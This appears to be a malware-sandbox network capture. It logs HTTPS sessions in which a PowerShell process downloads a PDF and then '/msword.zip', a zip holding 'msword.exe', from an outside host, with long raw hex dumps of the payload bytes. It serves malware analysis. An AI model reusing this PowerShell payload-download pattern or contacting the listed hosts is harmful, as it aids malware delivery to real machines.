                                                                      2024-12-16 00:33:04 UTC283INHTTP/1.1 200 OK
                                                                      Date: Mon, 16 Dec 2024 00:33:04 GMT
                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                      Last-Modified: Mon, 28 Oct 2024 21:28:02 GMT
                                                                      ETag: "4374e-6259024c862cf"
                                                                      Accept-Ranges: bytes
                                                                      Content-Length: 276302
                                                                      Connection: close
                                                                      Content-Type: application/pdf
                                                                      2024-12-16 00:33:04 UTC7909INData Raw: 25 50 44 46 2d 31 2e 34 0d 0a 25 c2 80 c2 81 c2 82 c2 83 0d 0a 31 20 30 20 6f 62 6a 0d 0a 3c 3c 20 0d 0a 20 20 20 2f 42 69 74 73 50 65 72 43 6f 6d 70 6f 6e 65 6e 74 20 31 20 0d 0a 20 20 20 2f 43 6f 6c 6f 72 53 70 61 63 65 20 33 20 30 20 52 20 0d 0a 20 20 20 2f 48 65 69 67 68 74 20 33 32 38 38 20 0d 0a 20 20 20 2f 53 75 62 74 79 70 65 20 2f 49 6d 61 67 65 20 0d 0a 20 20 20 2f 54 79 70 65 20 2f 58 4f 62 6a 65 63 74 20 0d 0a 20 20 20 2f 57 69 64 74 68 20 32 35 36 30 20 0d 0a 20 20 20 2f 46 69 6c 74 65 72 20 5b 0d 0a 20 20 20 20 2f 43 43 49 54 54 46 61 78 44 65 63 6f 64 65 20 20 5d 0d 0a 20 20 20 0d 0a 20 20 20 2f 44 65 63 6f 64 65 50 61 72 6d 73 20 5b 0d 0a 20 20 20 20 3c 3c 20 0d 0a 20 20 20 20 20 20 2f 42 6c 61 63 6b 49 73 31 20 74 72 75 65 20 0d 0a 20 20
                                                                      Data Ascii: %PDF-1.4%1 0 obj<< /BitsPerComponent 1 /ColorSpace 3 0 R /Height 3288 /Subtype /Image /Type /XObject /Width 2560 /Filter [ /CCITTFaxDecode ] /DecodeParms [ << /BlackIs1 true
                                                                      2024-12-16 00:33:04 UTC16384INData Raw: fe f7 fc 8c 7f ff ff 55 fd ef fe df fa 8d 69 3f 7e 71 11 d6 be 97 fd 97 0b fb f1 12 2b 58 a7 56 ab ff 17 fd fe af 65 c1 ff ef ff fa 76 37 ff fd bf d6 d2 5f bf ff ff 7f ff f6 fa f7 bf f9 11 c2 fe f9 15 ac b1 4a ff ea 10 fe ff fc 8b cf fb db f8 fe 43 8e 50 ef 0e fb 7d e9 6f e8 47 4e be 43 13 af ff ff ff ef df d3 f7 7f ad d7 ff df 56 d2 fb 4b 7f bb bd ef bb 6d 7e 41 43 58 a6 b5 aa b0 d6 43 47 10 50 a0 30 bf 7c 8b ab bd f8 30 4a ee 2b 7f 5e b5 e3 f6 bf fb ff 6b da df e9 ee fd af 0d 7f af bf 86 bd 84 e1 a6 bd eb 7c 30 9a 06 55 94 39 14 70 88 98 41 11 da 68 44 44 18 21 11 11 1c 44 7f ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff c8 09 f0 b8 20 79 01 85 01 0a 9b 25 04 10 79 01 05 d1 7c 8e c8 ec d4 32 5c 50 44 18 04 78 4f 29 95 26 4b 45 3b d1 95 01 b0 a7 20
                                                                      Data Ascii: Ui?~q+XVev7_JCP}oGNCVKm~ACXCGP0|0J+^k|0U9pAhDD!D y%y|2\PDxO)&KE;
                                                                      2024-12-16 00:33:05 UTC16384INData Raw: ff fc 89 22 97 91 f2 0c c8 90 f3 58 c8 36 48 14 8c 1e 4c 05 04 18 41 90 e0 40 cc c3 00 83 33 0c 02 0c d1 a6 10 71 68 3f d3 4d 6d 3f 91 2d a2 3c 7f 5e 46 f2 0b 12 e4 55 99 39 11 83 22 c2 eb 9b 18 22 28 b1 2a 14 38 86 6a 0a 62 34 82 06 7c 30 08 32 1c 13 04 c1 0c 20 c1 10 20 e1 a1 0e d3 4d 3f 09 da 7f 85 44 47 68 8e 1c 84 bc 97 bf a6 e9 fc b7 30 21 06 29 4e 2d 82 98 59 81 41 11 06 cf 00 c1 03 21 a2 3a 04 18 20 60 98 41 94 06 08 c0 c4 43 04 19 30 08 84 34 2d 34 ed 03 43 40 d5 06 a8 3f 4f 4f d1 08 3e 42 43 44 5b 6d 35 c8 b8 e0 9d 27 84 ea 1f e9 d2 6d f0 40 ca 18 20 c2 74 10 87 84 0c 20 d0 86 10 68 44 35 40 c2 0d 3b 86 83 d3 5c 27 ae ab aa de 88 b8 da 91 df e0 83 70 9d 04 e5 06 43 3d 04 e9 3d 3d 37 5f d3 7f 5a 68 5a 17 c5 a0 ed 38 b0 9a 7f ae 9f c8 dd d2 22 db
                                                                      Data Ascii: "X6HLA@3qh?Mm?-<^FU9""(*8jb4|02 M?DGh0!)N-YA!: `AC04-4C@?OO>BCD[m5'm@ t hD5@;\'pC===7_ZhZ8"
                                                                      2024-12-16 00:33:05 UTC16384INData Raw: 23 85 e2 a2 98 e2 9a ff 76 bf ab e9 a6 98 54 d0 88 86 08 89 b2 3e 22 19 46 e6 96 be 2b 90 9d d8 e3 63 f7 a7 6b fd a0 c2 6a 9a 0d 34 19 0b 61 08 83 04 0c 12 86 10 88 8e d7 bf 7e d5 3f 4c 26 98 4d 53 54 d3 08 30 9a 11 06 08 30 84 44 68 71 f6 b7 fa a6 43 be a4 c7 08 34 c2 0c 20 64 7b 17 04 22 23 fe 18 55 b4 d3 04 47 52 e0 20 61 08 e1 84 19 19 72 cd c2 a3 88 64 55 94 22 75 31 c4 71 11 6b 11 1f 6b f1 d7 ff ff f7 61 62 3f ff ff ff ff ff ff ff ff ef fa ff ff ff ff fe ff af fe ff ff ff ff ff ff ff ff ff ff ff ff ff 94 c2 9b cb 6d 69 fd ae 5a a6 a1 0e c5 33 b4 0b d9 5d 5d 96 69 f2 3b 32 10 64 71 9a 65 c1 0e 80 dc 20 66 a0 6e 83 5f 0b 96 61 34 50 66 98 21 22 d6 4a b2 c1 90 cd c2 75 93 a0 86 10 83 b4 1f af 5e 59 4c 22 e8 be 47 22 f9 9b 23 99 1d 17 23 38 a0 18 3a 0a
                                                                      Data Ascii: #vT>"F+ckj4a~?L&MST00DhqC4 d{"#UGR ardU"u1qkkab?miZ3]]i;2dqe fn_a4Pf!"Ju^YL"G"##8:
                                                                      2024-12-16 00:33:05 UTC16384INData Raw: f2 46 68 83 fb ff b9 4e ff da ff 0d 87 77 ff 44 63 be bd b4 0c 20 79 a3 77 b5 db 5b 4e ff bf f7 39 3f ff d7 7f ff a7 f1 f1 5e eb b7 ff 9c 2d 07 fa 5f a4 de bf 6b 7f ab 5b b6 17 af ff fe fe fa 5c 8f 9b 46 12 57 6b ee 96 ba ff 56 b6 bd 75 fd ff b6 bb c4 44 97 5b b4 be 18 56 2b fd 76 1a 4d af ff f8 5b 5e c2 5f ef 15 ec 57 fd 6f 1d a5 a6 b7 fb 0c 24 c5 6c 76 ba 4c 3f da 6b f7 e9 a6 3b df fe 3f 6b f4 ba f6 9a 77 f6 dd aa ff fd a6 b6 15 35 4d 06 a4 dc 21 10 61 03 04 3f 5b 4d 06 16 ff 5b 4d 06 84 30 85 a1 11 c4 47 76 ab 0c 10 61 06 10 88 88 88 32 2a 72 39 01 d4 44 68 96 8a 0c e3 82 11 1f c4 47 d7 d2 df f5 d6 98 5e 3d 63 bf ff ff ff ff f9 67 7f ac 7f ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd d5 cb 30 28 ce 88 ba 21 b3 a6 50 b2 ce 2f 90 f2
                                                                      Data Ascii: FhNwDc yw[N9?^-_k[\FWkVuD[V+vM[^_Wo$lvL?k;?kw5M!a?[M[M0Gva2*r9DhG^=cg0(!P/
                                                                      2024-12-16 00:33:05 UTC16384INData Raw: ea 08 c0 a1 7c 8e 9c 56 d5 44 e8 9b d4 33 ba 08 c3 da 87 84 08 7e 11 c4 53 e1 9e 29 91 d6 bc 1e 1a 4f 48 c2 13 a2 86 b2 e3 40 89 58 77 16 92 97 c4 bf 0d 3f c1 1c 7e 47 5d 5e 14 c6 22 61 58 71 42 a8 22 28 e0 fa 4e c2 9b 49 0d b8 c7 61 38 7a a8 6b 30 a1 37 88 20 46 05 8f ae 28 12 d4 47 14 c4 17 08 3d 68 25 a4 21 bc 36 60 6f f7 a0 81 05 98 48 10 b6 5d 62 08 f6 3d 30 aa 12 08 2d 04 1f a0 8a 70 8b ea d1 1d 78 45 0e bf 31 d0 73 3f 08 a1 d7 91 d6 81 11 fd f3 08 63 61 1c 5d 68 21 f1 f7 68 c6 33 c4 4c 75 49 42 07 c4 3b f9 84 2d 50 98 ea 92 84 38 bb fc 28 3a 7f 8d 16 39 87 ce ea d8 df 15 61 a7 6b 58 41 ed 62 85 21 88 4a ac c0 47 57 18 28 df 16 a1 55 c1 11 ee a6 7a 5b 48 a1 dd c4 d3 1b 40 8a f0 e3 d2 08 2e 9d dd d3 48 60 88 f8 6c 11 44 45 3f ee 18 60 c6 a5 44 5a ef
                                                                      Data Ascii: |VD3~S)OH@Xw?~G]^"aXqB"(NIa8zk07 F(G=h%!6`oH]b=0-pxE1s?ca]h!h3LuIB;-P8(:9akXAb!JGW(Uz[H@.H`lDE?`DZ
                                                                      2024-12-16 00:33:05 UTC16384INData Raw: ad 18 4b 1a 97 ef 54 81 15 08 45 dc fc a5 f3 f9 7c bd 58 8b b9 9f 64 78 f6 5f 30 ab 11 dc cd 18 cc 22 46 5d 35 42 3b 44 34 6a 4d 0a ed 6c 22 46 51 97 eb 73 aa c5 a7 1f ac 68 a3 3a e1 c4 53 b5 b8 84 1d c9 f2 13 d0 4c 64 f9 74 6b 56 35 88 88 88 b1 89 f4 5f 35 f5 88 88 88 be 26 32 0d 0a e3 42 2d 0e e2 44 d1 8e 61 d3 5c d0 58 e6 1f 2d c2 30 84 41 15 07 7c c3 98 70 53 0f 8a 16 b5 43 40 88 e1 4e 71 5f 10 96 61 e9 31 ab 14 a2 3d a0 44 7f 49 53 bb 51 b5 11 0a 35 fd c3 65 4e 47 6c a1 ca 71 8a 69 59 1f 36 81 12 1f 1d 29 74 81 17 59 81 92 22 3f 70 40 8e 3d d8 e3 23 e2 66 8c 69 90 f3 ea ae f2 3d f9 1d 20 45 d2 66 11 7d 06 92 c2 23 e0 8e 39 87 c4 44 64 7e ec 4c 44 3c 4b ac 11 c7 a1 64 7d 6f cf e2 63 3a 21 2f dd c6 47 93 b4 d4 fe 26 10 97 5d e9 9e d5 35 11 2e b3 3d 32
                                                                      Data Ascii: KTE|Xdx_0"F]5B;D4jMl"FQsh:SLdtkV5_5&2B-Da\X-0A|pSC@Nq_a1=DISQ5eNGlqiY6)tY"?p@=#fi= Ef}#9Dd~LD<Kd}oc:!/G&]5.=2
                                                                      2024-12-16 00:33:05 UTC16384INData Raw: 49 82 fd d7 b0 6b 54 ec 35 0e f3 0f 4c bb 60 a1 08 87 ff c3 83 c3 41 b5 62 e2 14 44 f6 f6 20 8a bb 84 71 e5 91 50 33 76 bf 07 f5 f8 3d ce e0 31 8b 62 13 15 34 44 76 a9 82 67 11 84 10 4e da f8 41 60 cc 38 ba c2 67 30 47 1f 61 cb ea b0 44 7d 8a 72 c8 14 1a 4d 8f e1 f6 fd 58 3b a2 64 19 99 27 36 74 e8 24 20 f9 1e 85 40 b8 2d ff 88 82 04 0a 1c 48 fb 74 47 e2 c8 f1 cc df 97 63 15 a0 84 5c b2 16 06 b7 f8 7f 4b e1 f8 22 1a 6c 81 24 3b 6c da 4c 30 92 2e b1 b1 75 08 21 9d d9 84 be 96 6f 43 34 93 23 cd 04 56 43 8d a0 ed b4 58 f1 09 98 ac b2 0b 02 a6 4a 1f ef b7 f4 c1 db 40 88 6d 32 0c e2 c3 15 14 82 0c be 2e 35 e1 b1 06 df 7c 42 2d d4 32 3f 41 02 23 a0 98 b9 cd 30 e1 bb 23 a6 9b 34 56 1b 23 c1 02 cb 20 90 32 bf fb 7e 97 b0 7e 08 3c ba 12 f5 c1 25 4a 7d 67 f0 81 0b
                                                                      Data Ascii: IkT5L`AbD qP3v=1b4DvgNA`8g0GaD}rMX;d'6t$ @-HtGc\K"l$;lL0.u!oC4#VCXJ@m2.5|B-2?A#0#4V# 2~~<%J}g
                                                                      2024-12-16 00:33:05 UTC16384INData Raw: b1 65 3b 4c 22 a8 7e 82 4d 84 b6 55 b1 15 41 11 f5 ad 2b 45 db 62 3f fe 35 44 1b 47 f2 c7 ff ff d7 ef 75 69 76 c4 42 36 bb 47 d4 e2 8f 6d b5 a4 20 c5 bc 48 e8 20 56 91 71 22 c2 1a 08 8f 98 df b8 52 6c c2 4d 7e 6a 83 1f bb fe dd 57 5f af fe b6 61 18 52 87 17 fa 4c a1 ca 78 30 84 45 bc fa 35 60 98 ff c9 0e 11 1d 36 6e 50 87 09 94 e0 8c 20 60 88 fa 2a 02 23 8a 08 13 68 11 1d 38 61 c2 23 ab 5f 6f 91 5c ce a2 e8 1a d9 27 20 90 4d d5 89 83 85 fa aa fa b0 d0 9c 71 10 69 af 4b 8b 89 f4 46 40 8a 78 dc 34 11 a6 db bd 53 e3 4c 5e 21 82 c2 87 16 08 12 4c 57 04 0b 68 11 43 82 0b b1 55 fb 63 b1 15 50 85 8d 3f 5a 5d 69 7e 1c 54 83 71 fd 28 5c 44 f3 48 be b6 47 44 74 48 d5 a6 50 7e f5 47 74 22 50 85 13 1e a5 d0 de 9a 29 d3 08 8f bf 0c 63 1e bf 4b 7f 08 84 82 f8 83 8f b4
                                                                      Data Ascii: e;L"~MUA+Eb?5DGuivB6Gm H Vq"RlM~jW_aRLx0E5`6nP `*#h8a#_o\' MqiKF@x4SL^!LWhCUcP?Z]i~Tq(\DHGDtHP~Gt"P)cK
                                                                      2024-12-16 00:33:05 UTC16384INData Raw: a2 3c e6 31 d4 47 1f b8 43 88 9c 88 e8 61 28 4e b1 04 12 77 f0 43 42 d1 1f 2f 18 c9 09 36 ed b1 23 a4 11 84 69 0f 06 60 52 3c 5f b3 e8 20 42 67 62 4e a9 6a a0 d0 60 ef f9 f4 26 d2 16 ea 7b 1d de 82 c2 55 36 2f a5 17 46 d0 d9 c4 9b ae c2 53 0f 0c 11 d3 bf a5 31 89 3f 6e 3b b6 2d 0c 8b 77 61 17 04 23 ae 82 2d d0 30 40 99 1d 62 a8 a1 e2 90 eb 8a 97 49 36 de af f0 fc 5f 3f 07 51 39 8a 25 62 f8 a1 41 06 2e c4 44 c4 0a 48 7b 09 23 12 d8 dd ee e8 23 49 8b 10 65 20 af 28 76 25 fc 8f 03 1f 08 32 a0 32 3a 96 e9 5b a3 e8 9e a0 8e 82 de 5e 11 5b a6 ce 27 f5 4c 4c 2b 73 71 8b 3c fd a3 da d9 1d be 82 65 00 90 f1 10 46 81 82 05 f6 a1 04 08 32 3a 05 4e 92 16 c4 ba 38 ae fc 52 23 ab 34 b4 82 46 12 2b 2a 37 6d 37 2a 22 14 61 38 6d 21 c3 d4 21 17 2e d8 49 1c d0 42 14 3b ee
                                                                      Data Ascii: <1GCa(NwCB/6#i`R<_ BgbNj`&{U6/FS1?n;-wa#-0@bI6_?Q9%bA.DH{##Ie (v%22:[^['LL+sq<eF2:N8R#4F+*7m7*"a8m!!.IB;


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      2192.168.2.449737193.26.115.214437340C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-12-16 00:33:09 UTC167OUTGET /msword.zip HTTP/1.1
                                                                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                      Host: myguyapp.com
                                                                      Connection: Keep-Alive
                                                                      2024-12-16 00:33:09 UTC285INHTTP/1.1 200 OK
                                                                      Date: Mon, 16 Dec 2024 00:33:09 GMT
                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                      Last-Modified: Tue, 29 Oct 2024 16:49:11 GMT
                                                                      ETag: "3a0583-625a05d5cdaa6"
                                                                      Accept-Ranges: bytes
                                                                      Content-Length: 3802499
                                                                      Connection: close
                                                                      Content-Type: application/zip
                                                                      2024-12-16 00:33:09 UTC7907INData Raw: 50 4b 03 04 14 00 00 00 08 00 05 ab 5c 59 89 46 99 25 0d 05 3a 00 f7 ff 1f 35 0a 00 00 00 6d 73 77 6f 72 64 2e 65 78 65 ec bd 7f 7c 54 c5 b9 3f 7e f6 47 c2 92 6c d8 45 12 0c 1a 34 42 50 94 1f 8d 2e 28 71 41 17 c8 09 d1 b2 b8 b8 66 17 94 00 2a c4 c3 8a 40 c9 39 fc 68 89 26 9c a4 b2 1e d6 5a 6b 6f b5 b5 b7 a6 d8 5b db da 4a 5b 2b 51 11 13 40 12 94 5a 14 2e a6 05 af 11 a9 ce ba 51 57 89 61 81 c8 f9 bc 9f 99 dd 10 b8 b6 bd 9f cf eb 7e ff fb 06 67 cf 9c 39 cf cc 3c f3 cc f3 73 66 ce d1 7f fb 23 92 4d 92 24 3b 92 69 4a 52 8b 24 fe 7c d2 bf fe db 8f 34 e4 d2 97 86 48 cf 0f fe f3 65 2d 96 d9 7f be ec 36 65 59 6d f1 aa d5 2b ef 59 7d e7 7d c5 77 df b9 62 c5 4a b5 f8 ae a5 c5 ab b5 15 c5 cb 56 14 97 df 12 2c be 6f e5 92 a5 13 f3 f2 72 4a d2 6d 4c ff ce 5b f7 66 5d
                                                                      Data Ascii: PK\YF%:5msword.exe|T?~GlE4BP.(qAf*@9h&Zko[J[+Q@Z.QWa~g9<sf#M$;iJR$|4He-6eYm+Y}}wbJV,orJmL[f]
                                                                      2024-12-16 00:33:09 UTC16384INData Raw: 56 85 d9 33 a3 08 bd c4 85 18 67 11 1f e7 f7 bf ca 60 3f 48 ff d4 ea 3d 51 fb 77 9a 66 52 54 de 13 ab 57 f0 78 9b 1c 75 f6 d1 78 be 62 7e 75 1a e1 bb c7 d0 e6 33 3f 2e 32 0f 59 b0 84 5b cf 7b 96 d4 20 bb f7 12 f2 2d d0 77 11 bb 18 c3 62 9b d0 83 59 b0 1b b3 54 06 28 57 e3 27 84 2d 6d fe 71 3c 7f 7f 19 c5 1b 66 c1 d3 34 36 07 1f db 68 34 28 f4 63 30 b3 2b ab be 58 15 14 72 12 14 c7 52 6a ca 26 10 1e 5a 6e 1a 9f 03 25 12 b5 57 24 4e 06 bc 56 42 67 31 88 c3 1c ab 70 fb 02 6e 23 17 2d da c1 a0 7f f8 19 43 73 6b 31 29 61 f6 c4 78 71 ee a3 41 e0 a6 de 18 b1 84 14 52 ec 66 c1 53 f5 bc df 09 55 21 76 a8 54 ca 54 2b e1 d5 ee a2 6a ec df 30 51 de d7 d4 dc b4 24 11 09 6a cc 2c ea f0 16 ed 89 aa 20 fb 19 aa c5 cf 80 39 ca 26 d0 2a a6 fa 9d 88 8d 5d 0a ce 8e d8 8d 4e
                                                                      Data Ascii: V3g`?H=QwfRTWxuxb~u3?.2Y[{ -wbYT(W'-mq<f46h4(c0+XrRj&Zn%W$NVBg1pn#-Csk1)axqARfSU!vTT+j0Q$j, 9&*]N
                                                                      2024-12-16 00:33:09 UTC16384INData Raw: ce 1d 83 46 b1 f2 54 b9 9e 4e 71 9d 6a 2d c6 ef 7d 69 7c 91 bb 91 53 be 42 e2 a3 03 11 c3 d0 d7 54 67 d7 39 17 bf 9a 5d fc b1 33 24 71 6a fb 4b 5f c6 9d a8 e2 12 63 c5 15 f3 ae 6b e7 1f 75 09 73 5d ba f8 d1 66 78 27 b5 6f 51 22 07 81 9c b6 b7 53 ae 42 ab 7a 20 3f 20 f1 0d e7 5c d9 fc 1d b7 b3 6b dc f3 5f fb 37 39 03 57 ac 2a de 97 de 5a 52 d0 5d 63 6a b8 58 3f 56 7e 35 6d 1b 3e 81 2f d0 8f 48 d4 da 3e d5 be 5e af b5 7a 3a ed 75 f8 93 6d 8e 1a c4 5f 82 9f 2b dc a2 3c 43 f2 a4 30 47 b4 8d ef 8e 9a db dd d1 11 df 1e cd 9f d3 1d 2c b9 39 62 7e 2c 36 8b c6 20 79 fb 8e d6 e1 a6 09 a5 15 4b 3d 58 c2 8f 8a cf 46 77 2b 8a 1b c0 75 39 1d a3 e5 ee e9 bc 1a e2 7c 1e 5c cd c0 74 7c cf 83 1f 6e b5 41 2b df 1c 0c 8a 3b 38 be 04 47 92 17 7d f5 df 1e 74 b3 3a 75 43 b0 cb
                                                                      Data Ascii: FTNqj-}i|SBTg9]3$qjK_ckus]fx'oQ"SBz ? \k_79W*ZR]cjX?V~5m>/H>^z:um_+<C0G,9b~,6 yK=XFw+u9|\t|nA+;8G}t:uC
                                                                      2024-12-16 00:33:09 UTC16384INData Raw: 93 60 7c 07 2b fd 2b 71 34 1d 1b b7 95 de 6d a8 d1 45 6c d2 7d 90 60 6e e4 d0 fb 59 98 e6 a7 b1 47 af bd f9 91 fe 7d 93 c8 34 a3 7c be bf a9 8b e0 f0 58 d4 f2 63 e3 a6 12 a8 49 60 db 1d 05 fc c4 df 2a bd 75 cf ac e2 8b fa 54 55 91 f5 75 4a 85 a3 44 b9 d4 d2 df 9e 3d d6 cd 4c 30 ac fb 65 88 e8 ad 62 79 9f a3 cd 1e 80 b5 f8 1f 45 c5 2b 26 1f 64 d8 20 21 74 57 6d 68 8f 70 29 c2 c6 ab b6 e7 02 62 d2 9c 41 27 59 c6 f9 52 39 04 51 f6 1c f1 aa c7 58 a5 18 64 48 94 0d 13 56 b6 cd dd 60 ca 70 40 85 2e 96 d0 d5 85 d1 d5 45 d1 d5 69 5c 18 3c 58 66 c8 26 32 38 33 21 96 0b 85 f1 a9 00 4b a9 44 51 92 2d b8 8a 4d 8a ee 7b b3 8e 22 16 09 ea 03 29 00 79 83 c1 1a e8 5a 23 7c 42 78 25 67 e3 63 15 6c 06 58 47 e9 95 97 25 f1 f3 35 5e 21 c7 09 0d d9 56 cf 71 54 84 a3 02 70 1f
                                                                      Data Ascii: `|++q4mEl}`nYG}4|XcI`*uTUuJD=L0ebyE+&d !tWmhp)bA'YR9QXdHV`p@.Ei\<Xf&283!KDQ-M{")yZ#|Bx%gclXG%5^!VqTp
                                                                      2024-12-16 00:33:09 UTC16384INData Raw: f9 b4 5f c7 58 37 b2 67 8f bf fc 08 56 d9 81 6d 04 63 79 f0 2f 7b 2a e2 2c 53 ba 09 64 06 3e e1 91 2b 5a b9 98 92 50 bd 80 bc 92 de 2e 1d 0e 07 79 b2 c7 6e d3 46 d8 40 cc c7 5d c4 77 de 35 60 24 4e bc f5 c9 0a 16 61 c5 65 0a b5 e3 18 3e 51 b0 5a 90 14 d8 10 95 c8 8e f9 c5 63 43 c0 f3 c4 b6 8e aa 13 af 9f fd e8 35 9e 21 ef 3b d1 ed 88 4e 48 44 70 57 27 1b bd 2f 9b 5e df de 69 aa 7e 00 da f6 8a 45 91 be ee 3c e7 2c 1b f1 d4 ff 4b 16 df 42 5b 5b 11 fe 91 e5 3b 55 46 34 6f b0 f0 e5 54 e4 42 70 d6 b9 c3 a8 d0 fe 4e f9 e3 11 75 34 1f c6 99 aa 3a c2 a5 fe 6c bc c6 f8 35 8d 62 01 ec 3a 9e 96 cb 81 6c 73 cb aa 34 29 f3 15 3d 34 a5 ea 29 97 56 6a 41 c2 c4 6e 9a 10 26 a2 e6 1c d6 f3 28 b0 dd ae b1 17 67 1d be 89 c2 e6 81 54 bc 6f bf 81 7a b6 bc f5 5f 9d b5 15 da a6
                                                                      Data Ascii: _X7gVmcy/{*,Sd>+ZP.ynF@]w5`$Nae>QZcC5!;NHDpW'/^i~E<,KB[[;UF4oTBpNu4:l5b:ls4)=4)VjAn&(gToz_
                                                                      2024-12-16 00:33:09 UTC16384INData Raw: 53 2f 24 2c 11 25 a5 75 42 9f ba 65 2a d8 59 b6 9f cc 8b 06 bd f4 bf c0 72 ed 69 97 5c 2f 66 35 40 2e fe d0 44 fa f3 fa 15 f1 98 0f d6 3f 75 25 87 af 9f 71 cb f4 65 55 36 b3 0f e4 bf 16 3e eb bd a2 a1 03 88 6c 47 de 8d 16 85 a2 03 f7 ea 0f d2 5d 3f 05 6b 75 52 03 76 4e 82 9f 7e 8f 25 f8 1b f6 a6 15 d7 0f ae 56 fb 1c 4b fe ca 9d d1 30 87 8c 5a e8 01 71 87 3b 38 62 22 82 11 dd cd c6 85 a7 b5 d0 9c 81 9c a4 08 49 9e 31 d7 37 84 71 67 85 4f 60 56 e9 cc a0 3d 3d 35 a8 31 c8 46 87 2c 07 4a 29 9b 06 f5 76 de 9a 00 75 bf 82 68 9e 96 1c 0b b5 61 e2 42 2b 44 8f 6b af 55 7d 7b 09 70 cb 22 60 53 f1 50 ca 93 e8 e1 d5 af 35 50 d9 28 8b 73 1f 21 20 ac 06 42 0c c4 07 34 43 32 c4 d0 8e 5c 88 8d 58 fb e2 99 f7 e5 23 5c dc f7 13 4c b1 d2 cd e0 c7 f6 d3 e9 e6 6b be 26 87 ec
                                                                      Data Ascii: S/$,%uBe*Yri\/f5@.D?u%qeU6>lG]?kuRvN~%VK0Zq;8b"I17qgO`V==51F,J)vuhaB+DkU}{p"`SP5P(s! B4C2\X#\Lk&
                                                                      2024-12-16 00:33:10 UTC16384INData Raw: b6 88 82 7a 44 8a 25 9b 38 0b 1b f5 8b 83 6d c3 42 b2 f4 78 a4 ee ab 2a 25 99 99 79 af ec e9 c5 ef 7b fc d7 0c 94 83 97 24 f9 7e 7f d8 f2 a8 0a f4 9c 72 0c 7b 79 7f f1 51 5f d1 83 82 b4 21 fa e3 93 7c 8f 83 26 14 95 cf 3d 37 4d 61 71 af fe c7 50 41 e9 f1 17 08 7f b3 42 c1 d3 d5 c3 69 77 27 64 7b bd ba 3b 45 8a 05 d2 e0 c0 0d b2 a6 7b 97 59 3f da ae 1a 6c 81 46 e0 da 93 fe d4 36 57 0d b2 14 1a d3 65 01 f5 28 5b d6 ed a9 65 73 a6 bd f2 bf c3 ef ba 4b 95 a3 8d df 42 92 a0 40 3d 81 1e 42 bc 0c 5c af f1 42 0b 98 1a 04 4d 4a 92 38 f1 c0 3b 4d e0 5e 14 08 fc 68 bf b1 1e 80 cb 6a ef 3f e6 20 5a 09 01 86 c5 10 28 38 0a 29 08 dd 5a be 5b f5 19 86 b2 a7 b7 06 5c 10 f7 8d a1 07 f9 17 5f 08 af 48 4c 3f 41 89 41 08 6c 98 a7 a8 00 0d cd ac 7f 10 82 d3 b8 ce 5c 06 79 b2
                                                                      Data Ascii: zD%8mBx*%y{$~r{yQ_!|&=7MaqPABiw'd{;E{Y?lF6We([esKB@=B\BMJ8;M^hj? Z(8)Z[\_HL?AAl\y
                                                                      2024-12-16 00:33:10 UTC16384INData Raw: 0d c6 fc 81 53 e3 a2 bb ae ce bd 5a 7f 5b 5c 40 7f a4 29 1f 32 7c 35 25 f2 e4 f9 73 14 63 6b a7 6f 26 45 9f ac 2d 4e 76 27 44 7f 9a cf 2a 7a 76 df e8 f2 8b 34 86 cf c7 34 60 55 3f 8f f3 7d 7d 57 67 ea 5b 28 4b 6e ae fb e2 e7 29 e7 c7 75 ae e9 97 7b be 54 d2 d5 31 8b 00 89 f5 5b 3a 35 32 b1 69 0d 8c 07 bc a3 68 62 88 f7 ee f5 88 0f e6 fa 11 df 44 e2 51 cd 63 ee 28 02 5d e0 27 be 1a 34 04 f0 2c fb 7c 9e f8 46 bb bc e1 db db 7d d1 0c ff 21 60 68 46 a4 2c b6 b8 6d fa d7 48 45 67 c0 d4 8c d9 ac 43 d9 80 0f 97 b7 da b4 db 10 92 43 1a ef 47 f1 71 f4 89 9a 59 78 d5 f0 b6 f4 60 e2 58 78 81 d4 23 61 71 fe c6 10 f7 fc f4 87 ed 67 b5 03 93 4f 2f 8c e6 1f 8e bd a0 cf 2c c0 4d 54 1f 61 2c 28 89 ba 24 6a a8 91 f4 d9 3a 4b f6 aa f5 31 8a dd 86 92 a2 97 f4 b5 0a eb c4 b6
                                                                      Data Ascii: SZ[\@)2|5%scko&E-Nv'D*zv44`U?}}Wg[(Kn)u{T1[:52ihbDQc(]'4,|F}!`hF,mHEgCCGqYx`Xx#aqgO/,MTa,($j:K1
                                                                      2024-12-16 00:33:10 UTC16384INData Raw: 37 49 78 13 37 5e b4 97 60 2a e6 0d b2 bc 19 67 ec 3b 9a 45 a7 cc 50 dd ac 3d cd 84 e9 05 95 5d 2e 3c 66 6f 26 74 9f 5f e6 43 1a f7 23 70 b6 bd 31 c0 63 c9 0d 3f 5f c9 49 6f e7 fb 36 b9 30 bf 52 fd 63 65 c3 c9 4c 07 da a0 07 70 6c 9c 10 96 81 c9 86 58 bb 8e 6a 0d 54 f3 1e 6c 48 61 77 97 72 cf a1 57 cb df 5e 5a 05 5d 04 66 6c a1 3c 3b 68 a8 99 88 0a 4a c9 65 38 95 2b d7 82 1c ee 96 eb f6 c2 b8 53 4b 76 71 23 1c 2e 7f a6 10 31 ac b9 00 1d b7 33 a4 fc dd d5 4e 7e e9 e1 cd 46 52 d4 25 c4 8c 7f 06 93 ca ee 14 8c 8c 9b 69 d8 27 91 4f e0 46 c5 05 04 aa ab 17 37 00 dd c6 a4 66 6e d1 56 36 90 14 75 76 b5 0b b3 a2 a4 29 30 94 08 43 60 53 c4 c4 db 52 2f 14 c9 60 11 ae 5a ce 2c ec 33 cc fd e7 10 de 0a 19 46 bd 02 b1 9c f9 f2 45 97 8a 9d 48 57 48 21 64 44 53 0c c2 c2
                                                                      Data Ascii: 7Ix7^`*g;EP=].<fo&t_C#p1c?_Io60RceLplXjTlHawrW^Z]fl<;hJe8+SKvq#.13N~FR%i'OF7fnV6uv)0C`SR/`Z,3FEHWH!dDS
